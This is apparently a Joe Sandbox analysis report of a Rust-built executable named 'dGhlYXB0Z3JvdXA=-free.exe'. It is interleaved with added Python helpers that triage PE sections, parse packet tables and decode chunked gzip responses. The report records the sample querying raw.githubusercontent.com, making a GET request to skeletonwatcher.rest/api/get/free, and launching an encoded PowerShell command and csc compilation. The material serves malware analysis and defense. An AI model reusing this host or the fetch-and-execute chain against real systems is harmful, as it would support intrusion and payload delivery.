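"""Section-table triage for a PE, driven by the values a sandbox report shows.

Added example; the thresholds below are the author's assumptions.
"""
import math
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Section:
    name: str
    virtual_address: int          # RVA
    virtual_size: int
    raw_size: int
    entropy: Optional[float]      # None where the report says "unknown"
    characteristics: frozenset    # IMAGE_SCN_* flags, abbreviated


# Transcribed from the report's section table (entropy "unknown" -> None).
SECTIONS: List[Section] = [
    Section(".text",  0x1000,    0x155e6a0, 0x155e800, None,               frozenset({"CODE", "EXECUTE", "READ"})),
    Section(".rdata", 0x1560000, 0x9fb1e4,  0x9fb200,  None,               frozenset({"INITIALIZED_DATA", "READ"})),
    Section(".data",  0x1f5c000, 0x2f9e0,   0x11e00,   2.77637946428186,   frozenset({"INITIALIZED_DATA", "READ", "WRITE"})),
    Section(".pdata", 0x1f8c000, 0xd2378,   0xd2400,   6.880219414842573,  frozenset({"INITIALIZED_DATA", "READ"})),
    Section("_RDATA", 0x205f000, 0x94,      0x200,     1.7840059761324978, frozenset({"INITIALIZED_DATA", "READ"})),
    Section(".rsrc",  0x2060000, 0x5084,    0x5200,    7.815647380372444,  frozenset({"INITIALIZED_DATA", "READ"})),
    Section(".reloc", 0x2066000, 0x1d308,   0x1d400,   5.4835830175533795, frozenset({"INITIALIZED_DATA", "DISCARDABLE", "READ"})),
]
IMAGE_BASE = 0x140000000
ENTRYPOINT = 0x14152fd70


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure in the Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections: List[Section], rva: int) -> Optional[Section]:
    """Return the section whose mapped range contains the RVA, or None."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + max(s.virtual_size, s.raw_size):
            return s
    return None


def triage(sections: List[Section], image_base: int, entrypoint: int,
           high_entropy: float = 7.0, slack_ratio: float = 2.0) -> List[str]:
    """Return human-readable findings; thresholds are assumptions, not report values."""
    findings = []
    ep = section_for_rva(sections, entrypoint - image_base)
    if ep is None:
        findings.append("entrypoint lies outside every section")
    elif "EXECUTE" not in ep.characteristics:
        findings.append(f"entrypoint in non-executable section {ep.name}")
    for s in sections:
        if {"EXECUTE", "WRITE"} <= s.characteristics:
            findings.append(f"{s.name}: writable and executable")
        if s.entropy is not None and s.entropy >= high_entropy:
            findings.append(f"{s.name}: high entropy {s.entropy:.2f} (compressed or packed content)")
        if s.raw_size and s.virtual_size > slack_ratio * s.raw_size:
            findings.append(f"{s.name}: virtual size 0x{s.virtual_size:x} far exceeds raw size "
                            f"0x{s.raw_size:x} (loader zero-fills the remainder)")
    return findings


if __name__ == "__main__":
    for line in triage(SECTIONS, IMAGE_BASE, ENTRYPOINT):
        print(line)
```

Run against this table the checks confirm that the entrypoint RVA 0x152fd70 falls inside the executable .text section and flag two sections: .data, whose virtual size 0x2f9e0 is well above the 0x11e00 bytes on disk, and .rsrc, whose entropy of 7.82 is accounted for here by the already-compressed PNG icons in the resource table below rather than by a packer, which is why the resource-level ZLIB complexity is worth reading alongside the entropy figure.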
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x20601d8 | 0x2dd | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.015006821282401
RT_ICON | 0x20604b8 | 0x54a | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.0081240768094535
RT_ICON | 0x2060a08 | 0x7b6 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | United States | 1.0030395136778116
RT_ICON | 0x20611c0 | 0xbce | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923891462607545
RT_ICON | 0x2061d90 | 0xf62 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0027932960893855
RT_ICON | 0x2062cf8 | 0x201a | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004867364322219
RT_GROUP_ICON | 0x2064d18 | 0x5a | data | English | United States | 0.8111111111111111
RT_VERSION | 0x2064d78 | 0x30c | data | English | United States | 0.46923076923076923
                                                                                                                                                  DLLImport
                                                                                                                                                  WS2_32.dlllisten, WSAGetLastError, closesocket, WSASendTo, WSARecvFrom, WSAGetOverlappedResult, setsockopt, WSASend, getsockopt, WSAIoctl, WSASocketW, WSARecv, getaddrinfo, getpeername, shutdown, recv, ioctlsocket, getsockname, WSACleanup, WSAStartup, freeaddrinfo, bind
                                                                                                                                                  KERNEL32.dllGetOEMCP, GetACP, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, HeapSize, GetFileSizeEx, GetConsoleOutputCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCommandLineA, SwitchToThread, SetConsoleMode, LeaveCriticalSection, CloseHandle, SetConsoleCursorPosition, lstrlenW, WaitForSingleObject, GetLastError, GetExitCodeProcess, GetCurrentProcessId, GetCommandLineW, GetProcessHeap, HeapFree, AddVectoredExceptionHandler, HeapAlloc, HeapReAlloc, GetStdHandle, GetFileInformationByHandleEx, GetConsoleMode, EnterCriticalSection, Sleep, DeviceIoControl, CreateHardLinkW, ReadFile, TerminateProcess, FreeLibrary, RegisterWaitForSingleObject, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessId, GetConsoleScreenBufferInfo, OpenProcess, SetCurrentDirectoryW, SetErrorMode, SetThreadErrorMode, LoadLibraryW, GetProcAddress, SetEnvironmentVariableW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetFileTime, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, SetFileCompletionNotificationModes, CancelIoEx, WriteFile, GetOverlappedResult, CreateIoCompletionPort, SetHandleInformation, WaitForSingleObjectEx, CreateFileW, CreateSemaphoreW, ReadDirectoryChangesW, ReleaseSemaphore, CancelIo, GetSystemInfo, SetFileInformationByHandle, GetConsoleCursorInfo, SetConsoleCursorInfo, ReadConsoleInputW, FillConsoleOutputCharacterA, FillConsoleOutputAttribute, GetFileInformationByHandle, TlsGetValue, TlsSetValue, DeleteCriticalSection, GetModuleHandleW, SetLastError, GetEnvironmentVariableW, WriteConsoleW, InitializeCriticalSection, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, GetCurrentDirectoryW, LoadLibraryA, CreateMutexA, RtlLookupFunctionEntry, TlsAlloc, FormatMessageW, GetTempPathW, GetModuleFileNameW, 
FlushFileBuffers, DuplicateHandle, SetFilePointerEx, FindNextFileW, CreateDirectoryW, ReadConsoleW, TryEnterCriticalSection, FindFirstFileW, CreateProcessW, CreateNamedPipeW, CreateEventW, WaitForMultipleObjects, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, FindClose, DeleteFileW, MoveFileExW, RemoveDirectoryW, RtlUnwind, CopyFileExW, CreateThread, GetFinalPathNameByHandleW, UnregisterWaitEx, SetConsoleTextAttribute, GetSystemTimes, GlobalMemoryStatusEx, GetVersionExA, RtlVirtualUnwind, GetTimeZoneInformation, WideCharToMultiByte, GetThreadTimes, GetCurrentThreadId, DeleteFileA, GetTempPathA, GetTempFileNameA, GetFileType, OutputDebugStringA, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, IsDebuggerPresent, TlsFree, QueryThreadCycleTime, GetThreadPriority, SetThreadPriority, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, TryAcquireSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, VirtualProtect, RtlAddFunctionTable, RtlDeleteFunctionTable, LoadLibraryExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceExecuteOnce, SetUnhandledExceptionFilter, RtlCaptureStackBackTrace, GetNativeSystemInfo, InitializeConditionVariable, OpenThread, SuspendThread, GetThreadContext, ResumeThread, CreateSemaphoreA, GetCPInfo, FindFirstFileExW, SetStdHandle, SetEndOfFile, ReleaseMutex, SetFileAttributesW, FreeLibraryAndExitThread, ExitThread, GetModuleHandleExW, EncodePointer, RtlUnwindEx, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetStartupInfoW, UnhandledExceptionFilter, InitializeSListHead, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount
ADVAPI32.dll: RegQueryValueExW, RegOpenKeyExW, SystemFunction036, RegCloseKey
dbghelp.dll: SymInitialize, SymGetSearchPathW, SymSetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, SymSetOptions, SymFromAddr, SymGetLineFromAddr64, StackWalk64
ole32.dll: CoTaskMemFree
SHELL32.dll: SHGetKnownFolderPath
WINMM.dll: timeGetTime
Exports:
Name | Ordinal | Address
CrashForExceptionInNonABICompliantCodeRange | 1 | 0x140bd31a0
Language of compilation system | Country where language is spoken
English | United States
TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 08:59:26.264153004 CET | 49208 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:26.268944979 CET | 53 | 49208 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 08:59:26.269076109 CET | 49208 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:26.273996115 CET | 53 | 49208 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 08:59:26.786333084 CET | 49208 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:26.803054094 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:26.803107023 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:26.803714991 CET | 49208 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:26.803778887 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:26.804413080 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:26.804429054 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:26.808870077 CET | 53 | 49208 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 08:59:26.810878038 CET | 49208 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:27.264209986 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:27.264769077 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:27.264794111 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:27.264868975 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:27.264875889 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:27.265942097 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:27.266007900 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:27.266351938 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:27.266388893 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:27.266496897 CET | 443 | 49214 | 185.199.110.133 | 192.168.2.5
Jan 2, 2025 08:59:27.266542912 CET | 49214 | 443 | 192.168.2.5 | 185.199.110.133
Jan 2, 2025 08:59:37.491955996 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:37.496721029 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.496795893 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:37.497200966 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:37.501987934 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.950889111 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.950901985 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.950918913 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.950938940 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:37.951011896 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:37.951040030 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:38.489793062 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
Jan 2, 2025 08:59:38.494858980 CET | 80 | 49285 | 188.114.97.3 | 192.168.2.5
Jan 2, 2025 08:59:38.494924068 CET | 49285 | 80 | 192.168.2.5 | 188.114.97.3
UDP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 08:59:26.263179064 CET | 53 | 51581 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 08:59:26.718080044 CET | 60222 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:26.725481033 CET | 53 | 60222 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 08:59:37.467358112 CET | 52591 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 08:59:37.490730047 CET | 53 | 52591 | 1.1.1.1 | 192.168.2.5
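The packet tables are exported with the port and address columns run together (the row `4920853192.168.2.51.1.1.1` is 49208, 53, 192.168.2.5, 1.1.1.1), which makes them awkward to feed into a timeline or a pcap-style index. The parser below is an added example, not part of the Joe Sandbox report: it enumerates every way to split a row into two ports and two IPv4 addresses and keeps the single reading in which the sandbox VM is one endpoint and the VM's side of the flow uses a port in the Windows default dynamic range 49152-65535. The VM address 192.168.2.5 is taken from this report's HTTP session table, and the dynamic-range rule is an assumption about the guest OS; both must be adjusted for other reports. Rows that still have two readings raise rather than guess. The sample rows are copied from the tables above.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List

# Address of the sandbox VM, taken from the report's HTTP session table (assumption per report).
ANALYSIS_HOST = "192.168.2.5"
# Default dynamic (ephemeral) client port range on Windows Vista and later (assumption).
EPHEMERAL = range(49152, 65536)

# "Jan 2, 2025 08:59:26.264153004 CET" followed by the fused port/IP digits.
_ROW = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})(\d[\d.]*)$")


@dataclass(frozen=True)
class Packet:
    timestamp: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _octet_ok(o: str) -> bool:
    return o.isdigit() and int(o) <= 255 and (o == "0" or o[0] != "0")


def _port_ok(p: str) -> bool:
    return p.isdigit() and 1 <= int(p) <= 65535 and p[0] != "0"


def _candidates(timestamp: str, fused: str) -> Iterator[Packet]:
    """Enumerate every split of the fused string into two ports and two IPv4 addresses."""
    parts = fused.split(".")
    if len(parts) != 7:  # a1.a2.a3.(a4b1).b2.b3.b4 always yields exactly 7 pieces
        return
    head, mid, tail = parts[0], parts[3], parts[4:]
    # head = src_port + dst_port + first octet of the source IP
    for a1_len in range(1, 4):
        if a1_len >= len(head):
            break
        ports, a1 = head[:-a1_len], head[-a1_len:]
        if not _octet_ok(a1):
            continue
        for cut in range(1, len(ports)):
            sp, dp = ports[:cut], ports[cut:]
            if not (_port_ok(sp) and _port_ok(dp)):
                continue
            # mid = last octet of the source IP + first octet of the dest IP
            for mcut in range(1, len(mid)):
                src = [a1, parts[1], parts[2], mid[:mcut]]
                dst = [mid[mcut:]] + tail
                if all(map(_octet_ok, src + dst)):
                    yield Packet(timestamp, int(sp), int(dp), ".".join(src), ".".join(dst))


def _plausible(p: Packet) -> bool:
    """The VM is exactly one endpoint, and its side of the flow uses an ephemeral port."""
    if p.src_ip == ANALYSIS_HOST and p.dst_ip != ANALYSIS_HOST:
        return p.src_port in EPHEMERAL and p.dst_port not in EPHEMERAL
    if p.dst_ip == ANALYSIS_HOST and p.src_ip != ANALYSIS_HOST:
        return p.dst_port in EPHEMERAL and p.src_port not in EPHEMERAL
    return False


def parse_row(line: str) -> Packet:
    m = _ROW.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    survivors = [c for c in _candidates(m.group(1), m.group(2)) if _plausible(c)]
    if len(survivors) != 1:
        raise ValueError(f"ambiguous row ({len(survivors)} readings): {line!r}")
    return survivors[0]


def parse_table(rows: List[str]) -> List[Packet]:
    """Parse a whole exported table, skipping blank lines and the header row."""
    return [parse_row(r) for r in rows if r.strip() and not r.startswith("Timestamp")]


def remote_endpoints(rows: List[str]) -> List[str]:
    """Distinct 'ip:port' services the VM talked to, in first-seen order."""
    seen: List[str] = []
    for p in parse_table(rows):
        ep = f"{p.dst_ip}:{p.dst_port}" if p.src_ip == ANALYSIS_HOST else f"{p.src_ip}:{p.src_port}"
        if ep not in seen:
            seen.append(ep)
    return seen


# Rows copied verbatim from the report's TCP and UDP packet tables.
REPORT_ROWS = [
    "Jan 2, 2025 08:59:26.264153004 CET4920853192.168.2.51.1.1.1",
    "Jan 2, 2025 08:59:26.268944979 CET53492081.1.1.1192.168.2.5",
    "Jan 2, 2025 08:59:26.803054094 CET49214443192.168.2.5185.199.110.133",
    "Jan 2, 2025 08:59:26.803107023 CET44349214185.199.110.133192.168.2.5",
    "Jan 2, 2025 08:59:37.491955996 CET4928580192.168.2.5188.114.97.3",
    "Jan 2, 2025 08:59:37.496721029 CET8049285188.114.97.3192.168.2.5",
    "Jan 2, 2025 08:59:26.263179064 CET53515811.1.1.1192.168.2.5",
    "Jan 2, 2025 08:59:37.467358112 CET5259153192.168.2.51.1.1.1",
]

if __name__ == "__main__":
    for pkt in parse_table(REPORT_ROWS):
        print(pkt)
    print(remote_endpoints(REPORT_ROWS))
```

The ephemeral-port rule is what breaks ties such as `5259153`, which could also be read as 52/59153; the VM-address rule is what rejects readings such as 92.168.2.5 that would otherwise leave a second valid port split. For a report from a different sandbox image, set `ANALYSIS_HOST` from its session table first.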
DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 08:59:26.718080044 CET | 192.168.2.5 | 1.1.1.1 | 0x29e3 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:37.467358112 CET | 192.168.2.5 | 1.1.1.1 | 0x8d04 | Standard query (0) | skeletonwatcher.rest | A (IP address) | IN (0x0001) | false
DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 08:59:26.725481033 CET | 1.1.1.1 | 192.168.2.5 | 0x29e3 | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:26.725481033 CET | 1.1.1.1 | 192.168.2.5 | 0x29e3 | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:26.725481033 CET | 1.1.1.1 | 192.168.2.5 | 0x29e3 | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:26.725481033 CET | 1.1.1.1 | 192.168.2.5 | 0x29e3 | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:37.490730047 CET | 1.1.1.1 | 192.168.2.5 | 0x8d04 | No error (0) | skeletonwatcher.rest | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 08:59:37.490730047 CET | 1.1.1.1 | 192.168.2.5 | 0x8d04 | No error (0) | skeletonwatcher.rest | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                                                                                                  • skeletonwatcher.rest
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49285 | 188.114.97.3 | 80 | 6004 | C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 08:59:37.497200966 CET | 122 | OUT | GET /api/get/free HTTP/1.1
                                                                                                                                                  accept: */*
                                                                                                                                                  user-agent: Deno/1.6.3
                                                                                                                                                  accept-encoding: gzip, br
                                                                                                                                                  host: skeletonwatcher.rest
Jan 2, 2025 08:59:37.950889111 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                  Date: Thu, 02 Jan 2025 07:59:37 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                                  Cache-Control: max-age=15
                                                                                                                                                  Expires: Thu, 02 Jan 2025 07:59:52 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxwCcR3duDu6tb7BHuiskrOr339PyGUN5chm%2Fr8RL3EUM23nSHRZRAzoEk4JRIDG%2F1%2B62bbxsxFFFK9ZT8Hk0AP4%2FTJVzQORMNfQmdXDM2yle%2FY39nglQByKRxzQcjnu1x4Al2t25Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8fb935f5dce7f795-EWR
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1402&min_rtt=1402&rtt_var=701&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=122&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                  Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e b0 94 ec bc 5c 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 f8 cc 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 fc 09 b4 e4 02 23 90 54 2d 17 11 2a f2 f5 4b 94 41 7a f4 1b 2a 2e 8a ef 84 3c 41 f5 38 00 87 a1 de fd 18 d4 f9 0b 50 e7 3f 00 b5 74 3d 9a 7f 71 68 97 fb 28 84 6c 23 95 48 79 36 49 9d 70 12 b3 9f 9d 43 e5 84 56 f0 2b fe ab 11 06 f9 11 fc 1b 3e 48 dd f0 42 52 83 69 12 ec 26 69 85 8e 02 2b a9 b1 e8 16 d1 d7 9b bf 92 f3 08 92 61 a2 74 ae 26 1e 61 b5 88 3e 68 e5 41 c9 cd ba c6 08 58 18 2d 22 87 f7 2e f1 f1 5e 6e 60 5e 42 f9 27 f9 fa 33 f9 a0 ab 9a 3a 91 cb 31 d0 f5 d5 e2 8a 2f 71 b4 4e
                                                                                                                                                  Data Ascii: 6cdXmob.\[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-#T-*KAz*.<A8P?t=qh(l#Hy6IpCV+>HBRi&i+at&a>hAX-".^n`^B'3:1/qN
Jan 2, 2025 08:59:37.950901985 CET | 224 | IN | Data Raw: d1 0a 17 91 d1 b9 76 76 64 a8 b4 50 1c ef e7 a0 74 a1 a5 d4 ed de 92 95 c0 b6 d6 c6 8d 16 b5 82 bb 72 c1 71 25 18 92 6e 30 17 4a 38 41 25 b1 8c 4a 5c 9c 05 14 29 d4 1d 18 94 8b c8 ba b5 44 5b 22 ba 08 04 5f 44 ac b8 0d af 08 b3 36 82 d2 60 b1 88
                                                                                                                                                  Data Ascii: vvdPtrq%n0J8A%J\)D["_D6`aK1;dWg8yr!{9C/Gj\CERr.1@d2R N{NR]6L]%uL;W&Znc$Cfz)G~2Q
Jan 2, 2025 08:59:37.950918913 CET | 1236 | IN | Data Raw: e7 74 58 0d b0 a2 06 7a 60 09 0b e0 9a 35 15 2a 17 2f d1 5d 49 f4 8f 7f 59 5f f3 e9 49 b0 21 54 a2 71 27 b3 cb 7e f5 b0 32 ee f6 15 73 61 6b 49 d7 b0 80 93 5c 6a 76 77 12 ec 1e 67 13 80 c7 49 9a 0c 5b db ab a2 c9 24 4d fa 42 f2 dc f9 cd a7 5c ac
                                                                                                                                                  Data Ascii: tXz`5*/]IY_I!Tq'~2sakI\jvwgI[$MB\Fe\7)+BH0<.A~G{%g:%F6>K!wj4b5B8:*Mt[;J?lWh|ymw[XQEZ7PB3B&(O sQ
Jan 2, 2025 08:59:37.950938940 CET | 6 | IN | Data Raw: 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
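The 403 body is delivered with `Transfer-Encoding: chunked` and `Content-Encoding: gzip`, which is why the hex dumps above open with a chunk-size line rather than HTML. The Python below is an added example, not part of the report: it turns the report's `Data Raw` lines back into bytes and parses the chunk framing, showing that the first frame declares a 0x6cd-byte (1741-byte) chunk whose payload starts with the gzip magic `1f 8b 08`, and that the final 6-byte frame is the zero-length terminating chunk (its leading `0a` is the tail of the previous chunk's CRLF, split across TCP segments). The page shows only the start of the large frames, so the compressed HTML itself cannot be rebuilt from it; the constants hold only the bytes that are visible on the page.

```python
import re
from typing import Dict, Tuple

GZIP_MAGIC = b"\x1f\x8b\x08"  # ID1, ID2, CM = deflate

# Leading bytes of the first "Data Raw" frame and the whole last frame of the
# 403 response, copied from the report (the first frame is truncated on the page).
FIRST_FRAME_HEX = "36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e b0"
LAST_FRAME_HEX = "0a 30 0d 0a 0d 0a"


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex line back into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def parse_chunk_header(frame: bytes) -> Tuple[int, bytes]:
    """Split a chunked-encoding frame into (declared chunk size, payload after the CRLF).

    The size line is hex and may carry ';ext=value' chunk extensions; anything
    else (e.g. a frame that is really mid-chunk data) is rejected.
    """
    size_line, sep, payload = frame.partition(b"\r\n")
    if not sep or not re.fullmatch(rb"[0-9a-fA-F]{1,8}(;[^\r\n]*)?", size_line):
        raise ValueError(f"malformed chunk-size line: {size_line!r}")
    return int(size_line.split(b";")[0], 16), payload


def is_gzip(payload: bytes) -> bool:
    return payload.startswith(GZIP_MAGIC)


def is_terminator(frame: bytes) -> bool:
    """True for the zero-length chunk '0\\r\\n\\r\\n' that closes a chunked body.

    A stray leading CR or LF belongs to the previous chunk's trailing CRLF when
    that CRLF was split across two TCP segments, as in the report's last frame.
    """
    return frame.lstrip(b"\r\n") == b"0\r\n\r\n"


def describe_body(first_frame_hex: str, last_frame_hex: str) -> Dict[str, object]:
    """Summarise what the visible framing tells us about the response body."""
    size, payload = parse_chunk_header(hexdump_to_bytes(first_frame_hex))
    return {
        "first_chunk_bytes": size,
        "gzip": is_gzip(payload),
        "terminated": is_terminator(hexdump_to_bytes(last_frame_hex)),
    }


if __name__ == "__main__":
    print(describe_body(FIRST_FRAME_HEX, LAST_FRAME_HEX))
```

Because the 403 carries `Server: cloudflare` and a Cloudflare HTML body, the sample did not retrieve anything from `/api/get/free` in this run; the request line, the `Deno/1.6.3` user-agent and the `skeletonwatcher.rest` host header are the network indicators this capture actually yields.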


Target ID: 0
Start time: 02:59:06
Start date: 02/01/2025
Path: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"
Imagebase: 0x7ff675780000
File size: 34'433'319 bytes
MD5 hash: EDE0A1C97EAA446541DCFCCD6FA9A6A7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Rust
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:59:06
Start date: 02/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:59:10
Start date: 02/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:59:24
Start date: 02/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
Imagebase: 0x7ff7b0010000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
